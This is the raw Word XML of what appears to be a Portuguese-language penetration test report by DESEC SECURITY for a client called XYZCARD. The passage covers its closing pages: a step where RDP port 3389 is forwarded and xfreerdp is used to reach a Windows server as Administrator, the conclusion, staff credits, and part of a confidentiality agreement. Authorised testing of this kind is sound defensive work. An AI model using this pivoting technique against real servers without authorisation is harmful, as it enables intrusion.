        <w:t xml:space="preserve">Utilizando o encaminhamento de portas </w:t>
      </w:r>
      <w:r w:rsidR="00493D68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00493D68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a porta 3389 (Terminal Service) para a nossa maquina local e utilizamos o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00493D68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00493D68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cliente RDP) para acessar o Windows server como Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECBC488" w14:textId="69091818" w:rsidR="00D81233" w:rsidRPr="00D81233" w:rsidRDefault="00D81233" w:rsidP="001A49AA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1CEE477C" wp14:editId="11CC32C0">
            <wp:extent cx="5400040" cy="3382010"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 13.37.4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E438" w14:textId="464201AB" w:rsidR="00640235" w:rsidRDefault="00E95520" w:rsidP="001A49AA">
      <w:pPr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Acesso ao Servidor Principal com acesso Administrativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF9DBC" w14:textId="77777777" w:rsidR="00C07F3F" w:rsidRDefault="00C07F3F" w:rsidP="001A49AA">
      <w:pPr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E12F655" w14:textId="77777777" w:rsidR="00C07F3F" w:rsidRDefault="00C07F3F" w:rsidP="001A49AA">
      <w:pPr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8810E32" w14:textId="77777777" w:rsidR="00C07F3F" w:rsidRDefault="00C07F3F" w:rsidP="001A49AA">
      <w:pPr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A0A5C9F" w14:textId="77777777" w:rsidR="00C07F3F" w:rsidRDefault="00C07F3F" w:rsidP="001A49AA">
      <w:pPr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A900C0B" w14:textId="77777777" w:rsidR="00C07F3F" w:rsidRDefault="00C07F3F" w:rsidP="001A49AA">
      <w:pPr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78153A8" w14:textId="77777777" w:rsidR="00D82358" w:rsidRPr="003C50ED" w:rsidRDefault="00D82358" w:rsidP="008D2AB5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ED4E035" w14:textId="77777777" w:rsidR="0076245B" w:rsidRDefault="0076245B" w:rsidP="001A49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AA4DA2" w14:textId="77777777" w:rsidR="00012EFD" w:rsidRDefault="00012EFD" w:rsidP="00012EFD">
      <w:p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712DC5" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="00012EFD" w:rsidRDefault="0076245B" w:rsidP="00012EFD">
      <w:p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EFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusão</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5CA50" w14:textId="77777777" w:rsidR="00012EFD" w:rsidRDefault="00012EFD" w:rsidP="00012EFD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35F40B2" w14:textId="77777777" w:rsidR="00012EFD" w:rsidRDefault="00012EFD" w:rsidP="00012EFD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SEC SECURITY conclui este trabalho com objetivo atingido no qual foi possível identificar problemas de segurança e recomendar suas possíveis mitigações.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841BA37" w14:textId="77777777" w:rsidR="00012EFD" w:rsidRDefault="00012EFD" w:rsidP="00012EFD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C91A9BE" w14:textId="52C0CEA2" w:rsidR="00012EFD" w:rsidRDefault="00012EFD" w:rsidP="00012EFD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a CONTRATANTE aplicar todas as correções sugeridas a DESEC SECURITY irá</w:t>
      </w:r>
      <w:r w:rsidR="00C07F3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> executar o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C07F3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reteste</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C07F3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> afim de validar as correções aplicadas pelo cli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29CF18" w14:textId="77777777" w:rsidR="00012EFD" w:rsidRDefault="00012EFD" w:rsidP="00012EFD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DFA82DD" w14:textId="77777777" w:rsidR="00012EFD" w:rsidRPr="003C50ED" w:rsidRDefault="00012EFD" w:rsidP="00012EFD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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Desde já agradecemos a oportunidade em oferecermos nossos serviç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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>profissionais e estamos a sua disposição para qualquer dúvida que consider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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pertinentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B4C7F" w14:textId="77777777" w:rsidR="0076245B" w:rsidRDefault="0076245B" w:rsidP="00012EF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3299C7" w14:textId="77777777" w:rsidR="00012EFD" w:rsidRPr="00012EFD" w:rsidRDefault="00012EFD" w:rsidP="00012EFD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EFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Corpo Técnico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8107E" w14:textId="4B3A5617" w:rsidR="0076245B" w:rsidRPr="00C07F3F" w:rsidRDefault="00012EFD" w:rsidP="00C07F3F">
      <w:pPr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cardo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Longatto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A5030A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> | CEH </w:t>
      </w:r>
      <w:r w:rsidR="00C07F3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A5030A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Penetration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A50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30A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A50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30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50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30A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Offsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A50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30A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Specialist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C07F3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C07F3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Desec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C07F3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security</w:t>
      </w:r>
      <w:r w:rsidR="00C07F3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00012EF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ontato@desec.com.br</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="520841CC" w14:textId="77777777" w:rsidR="0076245B" w:rsidRDefault="0076245B" w:rsidP="00A5030A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929866E" w14:textId="77777777" w:rsidR="00A5030A" w:rsidRDefault="00A5030A" w:rsidP="00A5030A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91713E9" w14:textId="77777777" w:rsidR="00A5030A" w:rsidRDefault="00A5030A" w:rsidP="00A5030A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563A556" w14:textId="77777777" w:rsidR="00A5030A" w:rsidRDefault="00A5030A" w:rsidP="00A5030A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53BAEFC" w14:textId="77777777" w:rsidR="008D2AB5" w:rsidRDefault="008D2AB5" w:rsidP="00A5030A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CAD054" w14:textId="77777777" w:rsidR="00A5030A" w:rsidRDefault="00A5030A" w:rsidP="00A5030A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1A6D233" w14:textId="77777777" w:rsidR="00A5030A" w:rsidRDefault="00A5030A" w:rsidP="00A5030A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7DAC466" w14:textId="77777777" w:rsidR="00A5030A" w:rsidRDefault="00A5030A" w:rsidP="00A5030A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EAD36AD" w14:textId="77777777" w:rsidR="00A5030A" w:rsidRDefault="00A5030A" w:rsidP="00A5030A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8A9FAB1" w14:textId="77777777" w:rsidR="00A5030A" w:rsidRDefault="00A5030A" w:rsidP="00A5030A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1D106DA" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF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Helvetica-Bold" w:hAnsi="Helvetica-Bold" w:cs="Helvetica-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B00A791" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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Helvetica-Bold" w:hAnsi="Helvetica-Bold" w:cs="Helvetica-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica-Bold" w:hAnsi="Helvetica-Bold" w:cs="Helvetica-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Anexo I – Acordo de Confidencialidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132965BB" w14:textId="77777777" w:rsidR="0076245B" w:rsidRDefault="0076245B" w:rsidP="001B03DF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Helvetica-Bold" w:hAnsi="Helvetica-Bold" w:cs="Helvetica-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36307ABF" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF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Helvetica-Bold" w:hAnsi="Helvetica-Bold" w:cs="Helvetica-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE1B39F" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATANTE </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001B03DF" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>XYZCARD</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">) e a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001B03DF" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DESEC SECURITY</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) acordam entre si:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4CA7A" w14:textId="77777777" w:rsidR="0076245B" w:rsidRDefault="0076245B" w:rsidP="001B03DF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27C8A3EE" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF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5745B3CE" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1. A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATANTE </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">entrega a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>informação de sua propriedade relativos às</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280FD794" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>configurações</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> de segurança de seus dispositivos informáticos sujeitos ao objeto da atividade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE1845" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>contratada</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Teste de </w:t>
      </w:r>
      <w:r w:rsidR="001B03DF" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Intrusão</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785B7D4" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF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1FEA12AB" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">2. A informação entregue pela </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATANTE </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">à </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>vice versa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, relacionado ao objeto ou</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DADBA5" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mesmo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> produto da atividade contratada se constitui Informação Confidencial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74294B9D" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF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6F46BDD8" w14:textId="77777777" w:rsidR="0076245B" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">3. A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>se obriga a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDF265" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF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4E78C7F6" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:r w:rsidR="001B03DF" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Manter em caráter sigiloso a Informação Confidencial e não disponibilizá-la a terceiros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9BF5D9" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B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03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> o consentimento da </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONTRATANTE</w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C333244" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>b. Utilizar a Informação Confidencial exclusivamente para a atividade contratada e tarefas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C2986" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>definidas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> no escopo deste trabalho.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A71FD2E" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
